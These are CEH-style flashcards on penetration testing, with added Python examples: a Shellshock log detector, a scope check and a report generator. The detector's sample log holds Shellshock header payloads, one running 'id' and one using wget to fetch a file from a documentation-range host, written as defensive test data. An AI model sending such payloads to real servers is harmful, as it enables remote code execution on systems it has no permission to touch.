Chapter 12 - The Pen Test, Putting it all Together Flashcards
Security Assessment
any test performed to assess the level of security on a network or system
3 categories of security assessments
security audit
vulnerability assessment
penetration test
Security Audit
policy and procedure focused
tests whether the organization is following specific standards and policies they have in place
Vulnerability assessment
scans and tests a system or network for existing vulnerabilities but doesn’t exploit them
Penetration test
searches for vulnerabilities and actively seeks to exploit them
must have an agreement in place before testing begins
agreement should spell out the limitations, constraints and liabilities between the organization and the pen test team. A separate indemnity form releasing you from financial liability is also necessary (e.g., what if a port scan accidentally takes down a server?)
Exam Tip: know the Shellshock vulnerability
aka Bashdoor, Bash Bug, CVE-2014-6271
affected the Bash shell found in most versions of Linux, Unix and Mac OS X, and some Linux-based routers with a CGI-enabled web interface. Vulnerable bash kept executing whatever followed a function definition stored in an environment variable, and CGI servers copy HTTP headers into environment variables, so a crafted header was enough
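Added example (not part of the flashcards or the CEH text): a small detector that reads web server access logs and flags the Shellshock pattern, `() { ... };` followed by a trailing command, in the header fields a CGI server would export into the environment. It also wraps the canonical local self-test against `bash`. The log lines are constructed with RFC 5737 documentation addresses, not real traffic.

```python
"""Detect CVE-2014-6271 (Shellshock) exploitation attempts in web server logs.

A vulnerable Bash imported any environment variable whose value began with
"() {" as a function definition and kept executing whatever followed the
closing brace.  CGI servers copy HTTP headers (User-Agent, Referer, Cookie,
custom headers) into environment variables before invoking a script, so the
attacker only had to put a crafted value in a header.
"""
import re
import shutil
import subprocess
from typing import Dict, List, Optional

# A Bash function definition followed by a trailing command, e.g.
#   () { :; }; /bin/bash -c 'id'
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;\s*(?P<payload>\S.*)")

# Apache/nginx combined log format; only the fields we need are captured.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (not real traffic): one benign request, then a
# payload in User-Agent, then a payload in Referer.
SAMPLE_LOG = r'''
203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c 'id'"
198.51.100.9 - - [25/Sep/2014:10:02:41 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { ignored; }; wget http://198.51.100.9/x -O /tmp/x" "curl/7.37.0"
'''.strip()


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per header value that carries a Shellshock payload."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("ua", "referer", "request"):
            m = SHELLSHOCK_RE.search(rec[field])
            if m:
                findings.append({
                    "line": lineno,
                    "src": rec["ip"],
                    "field": field,
                    "payload": m.group("payload").strip(),
                })
    return findings


def local_bash_vulnerable() -> Optional[bool]:
    """Run the canonical Shellshock self-test against the local bash.

    Exports x='() { :; }; echo VULNERABLE' and runs an unrelated command;
    an unpatched bash executes the trailing echo while importing x.
    Returns True if it did, False if not, None if bash is not installed.
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = {"x": "() { :; }; echo VULNERABLE"}
    proc = subprocess.run([bash, "-c", "echo test"], env=env,
                          capture_output=True, text=True)
    return "VULNERABLE" in proc.stdout


if __name__ == "__main__":
    for f in find_shellshock_attempts(SAMPLE_LOG):
        print(f"line {f['line']}: {f['src']} via {f['field']}: {f['payload']}")
    print("local bash vulnerable:", local_bash_vulnerable())
```

The detector matches the structure of the payload rather than specific commands, so obfuscated trailing commands are still caught; a patched bash no longer parses function definitions from arbitrary variable names, which is why the self-test prints nothing extra on a fixed system.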
External assessment
analyzes publicly available information, then performs network scanning, enumeration and testing from outside the network perimeter, usually from the internet
Internal assessment
performed from inside the organization
define black, white, gray box testing
black - no knowledge of the infrastructure; simulates an outside hacker
white - complete knowledge of the infrastructure; simulates an insider
gray - some information on the infrastructure
red team
the offensive team (the hacking group); works black-box style with no prior knowledge
blue team
defensive team
automated testing
codenomicon
core impact pro
metasploit (with Autopwn module)
CANVAS
point and shoot with an all-inclusive tool set, like Core Impact
can save time and money, but is prone to false positives and negatives, and the tool doesn’t necessarily care about your scope agreement
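Added example (not from the flashcards or any of the tools named above): a pre-flight scope check that sorts a requested target list against the signed scope before anything is handed to a scanner. The in-scope ranges, exclusions and target list are constructed from RFC 5737 documentation addresses; the `nmap` flags used (`-Pn`, `-sV`, `--exclude`) are real nmap options.

```python
"""Pre-flight scope check before handing targets to an automated scanner.

The scanner will happily scan whatever it is given, so the rules of
engagement have to be enforced by the tester before the scan starts.
Scope, exclusions and targets below are constructed for the demo.
"""
import ipaddress
from typing import Dict, List

# Signed scope: what the agreement allows, and what it explicitly excludes.
IN_SCOPE = ["203.0.113.0/24", "198.51.100.10"]
EXCLUDED = ["203.0.113.250/31"]      # e.g. the client's production database pair


def _networks(items: List[str]):
    return [ipaddress.ip_network(i, strict=False) for i in items]


def classify_targets(targets: List[str], in_scope: List[str] = IN_SCOPE,
                     excluded: List[str] = EXCLUDED) -> Dict[str, List[str]]:
    """Sort each requested target into allowed / excluded / out_of_scope / invalid.

    A target is allowed only if it lies entirely inside one in-scope range and
    touches no excluded range; a CIDR that spills past the scope is rejected
    whole rather than trimmed, so nothing gets scanned by accident.
    """
    scope, excl = _networks(in_scope), _networks(excluded)
    result: Dict[str, List[str]] = {"allowed": [], "excluded": [],
                                    "out_of_scope": [], "invalid": []}
    for t in targets:
        try:
            net = ipaddress.ip_network(t, strict=False)
        except ValueError:
            result["invalid"].append(t)      # hostnames must be resolved and re-checked
            continue
        inside = any(net.version == s.version and net.subnet_of(s) for s in scope)
        if not inside:
            result["out_of_scope"].append(t)
        elif any(net.version == e.version and net.overlaps(e) for e in excl):
            result["excluded"].append(t)     # any overlap with an exclusion fails safe
        else:
            result["allowed"].append(t)
    return result


def nmap_args(classified: Dict[str, List[str]],
              excluded: List[str] = EXCLUDED) -> List[str]:
    """Build the nmap argument list from allowed targets only, passing the
    exclusions again with --exclude as a second line of defence."""
    args = ["nmap", "-Pn", "-sV"]
    if excluded:
        args += ["--exclude", ",".join(excluded)]
    return args + classified["allowed"]


# Constructed target list a colleague might hand you, including two mistakes:
# a /23 that spills outside the /24, and a host next door to an in-scope one.
REQUESTED = ["203.0.113.7", "203.0.113.0/25", "203.0.113.251",
             "203.0.113.0/23", "198.51.100.10", "198.51.100.11", "not-a-host"]

if __name__ == "__main__":
    classified = classify_targets(REQUESTED)
    for bucket, items in classified.items():
        print(f"{bucket:13s} {items}")
    if classified["out_of_scope"] or classified["invalid"]:
        print("refusing to scan until the target list is corrected")
    else:
        print(" ".join(nmap_args(classified)))
```

The check refuses to run at all while anything is out of scope or unresolved, rather than silently scanning the subset that happens to be allowed; a colleague who wrote `/23` when they meant `/24` should find out before the scanner does.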
3 phases of a pen test
pre-attack
attack
post-attack
pre-attack phase
reconnaissance and data gathering
identify network ranges and IP ranges, DNS enumeration, nmap network scanning, testing proxy servers, checking for firewalls
attack phase
attempt to penetrate network perimeter, acquire targets, execute attacks, elevate privileges
verify ACLs by crafting packets; see if you can use covert tunnels; try XSS, buffer overflows, SQL injection, password cracking
post attack
clean up anything uploaded to the network: remove tools, malware, backdoors and attack software
provide deliverables: reports, etc.
5 basics of a pen test report
executive summary (if the customer uses FISMA, DIACAP, RMF, HIPAA, etc., this summary is tailored to that framework)
names of participants and dates of tests
list of findings, usually ordered by risk
analysis of each finding and recommended mitigation steps
log files and evidence from your toolset; customers usually want screenshots
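Added example (not from the flashcards or the CEH text): a small script that orders findings by risk and renders the five report parts listed above in that order. Severity labels use the usual qualitative bands (critical/high/medium/low/info), and the tie-breakers (confirmed exploitation, then number of affected hosts) are this example's own choice, not a standard. The findings, client and tester names are constructed.

```python
"""Order pen test findings by risk and render the five-part report skeleton.

Sample data is constructed for illustration, not from a real engagement.
"""
from dataclasses import dataclass
from typing import List, Optional

SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1, "info": 0}


@dataclass
class Finding:
    title: str
    severity: str            # critical / high / medium / low / info
    affected: List[str]      # hosts or URLs
    analysis: str
    mitigation: str
    evidence: List[str]      # tool output files, screenshots
    exploited: bool = False  # confirmed by exploitation, not just a scanner hit


def risk_key(f: Finding):
    """Sort key: severity first, then confirmed exploitation, then blast radius."""
    return (SEVERITY_RANK[f.severity.lower()], f.exploited, len(f.affected))


def order_by_risk(findings: List[Finding]) -> List[Finding]:
    return sorted(findings, key=risk_key, reverse=True)


def render_report(client: str, testers: List[str], start: str, end: str,
                  findings: List[Finding], framework: Optional[str] = None) -> str:
    """Summary, participants and dates, findings by risk, analysis and
    mitigation per finding, evidence: the five parts in that order."""
    ranked = order_by_risk(findings)
    counts = {}
    for f in ranked:
        counts[f.severity.lower()] = counts.get(f.severity.lower(), 0) + 1
    summary = ", ".join(f"{n} {sev}" for sev, n in sorted(
        counts.items(), key=lambda kv: SEVERITY_RANK[kv[0]], reverse=True))
    lines = [f"# Penetration Test Report: {client}", "",
             "## 1. Executive summary",
             f"{len(ranked)} findings ({summary})."
             + (f" Mapped to {framework} controls." if framework else ""), "",
             "## 2. Participants and dates",
             f"Testers: {', '.join(testers)}", f"Testing window: {start} to {end}", "",
             "## 3. Findings (ordered by risk)"]
    for i, f in enumerate(ranked, 1):
        tag = ", exploited" if f.exploited else ""
        lines.append(f"{i}. [{f.severity.upper()}] {f.title} ({len(f.affected)} affected{tag})")
    lines += ["", "## 4. Analysis and recommended mitigation"]
    for i, f in enumerate(ranked, 1):
        lines += [f"### {i}. {f.title}", f"Affected: {', '.join(f.affected)}",
                  f"Analysis: {f.analysis}", f"Mitigation: {f.mitigation}", ""]
    lines.append("## 5. Evidence")
    for i, f in enumerate(ranked, 1):
        for ev in f.evidence:
            lines.append(f"- Finding {i}: {ev}")
    return "\n".join(lines)


# Constructed sample findings, deliberately listed out of risk order.
SAMPLE_FINDINGS = [
    Finding("Outdated TLS configuration", "low", ["www.example.test"],
            "Server still offers TLS 1.0.", "Disable TLS 1.0/1.1.", ["sslscan-www.txt"]),
    Finding("SQL injection in login form", "high", ["app.example.test"],
            "Username parameter is concatenated into a query.",
            "Use parameterised queries.", ["sqli-login.png"], exploited=True),
    Finding("Shellshock on CGI status page (CVE-2014-6271)", "critical",
            ["status.example.test", "monitor.example.test"],
            "Unpatched bash; header values reach the CGI environment.",
            "Patch bash; remove the CGI script.", ["shellshock-id.png"], exploited=True),
    Finding("Reflected XSS in search", "medium", ["app.example.test"],
            "Query string echoed unencoded.", "Output-encode user input.", ["xss.png"]),
]

if __name__ == "__main__":
    print(render_report("Example Corp", ["A. Tester", "B. Tester"],
                        "2024-03-04", "2024-03-08", SAMPLE_FINDINGS, framework="RMF"))
```

Keeping the ordering in one `risk_key` function means the findings list, the per-finding analysis and the evidence section all agree on the numbering, which is the part reviewers most often find inconsistent in hand-assembled reports.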
Open Source Security Testing Methodology Manual (OSSTMM)
created by the Institute for Security and Open Methodologies (ISECOM) in 2001
an effort to improve how security is tested
a peer-reviewed manual of security testing and analysis
results in fact-based actions that improve security
downloadable as a PDF file
constantly updated
Testing Guidelines and Methodologies
OSSTMM
SANS
OWASP
OSSTMM and SANS have their own methodologies
OWASP focuses on web servers and applications
EC-Council’s 4 categories of insider threats
pure insider
insider associate
insider affiliate
outside affiliate
pure insider
an employee with all the rights and access an employee has (physical and network access, badge, etc.)
common problem is that their privileges are often higher than they need to be
insider associate
someone with limited access, like a contractor, janitor or guard
has physical access but not network access; not an employee
insider affiliate
a friend, spouse or client of an employee who uses the employee’s credentials to gain access
the key thing is not the person so much as the credentials
outside affiliate
someone outside the organization, untrusted and unknown, who uses an open access channel to gain access
example: someone using an unsecured wireless access point